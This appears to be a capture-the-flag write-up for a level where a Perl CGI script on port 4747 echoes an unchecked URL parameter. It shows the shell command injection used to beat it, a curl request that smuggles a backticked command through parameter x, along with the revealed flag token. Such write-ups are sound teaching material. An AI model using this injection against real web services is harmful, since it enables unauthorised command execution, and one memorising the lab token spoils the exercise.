## Level 04

### First step

By looking at the *level04.pl* file we can see that a **CGI** module is used.  
> CGI: is a standard for external gateway programs to interface with information servers such as HTTP servers.  

We can also see a commented line with *localhost:4747*

### Second step  

By running a *netstat* command as follow:
```bash
$> netstat -lepunt
```

We get a list of all running programs with their related ports. 

```bash
tcp6       0      0 :::4747                 :::*                    LISTEN      0          10917
```

This means, a localhost server is running on port 4747 as expected by the perl program.  

### Third step  

By looking at the *level04.pl* file again we can see a print function called with an *echo* command to be executed with an argument corresponding to a url parameter of key *x*. This argument can be anything as it is not protected.

```bash
$> curl 0.0.0.0:4747?x=toto
toto
```

### Final step  

Let's run a *curl* by passing the *getflag* command that will be executed by the perl program since it does not do any checking on the parameter's value passed.

```bash
$> curl 0.0.0.0:4747?x=\`getflag\`
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```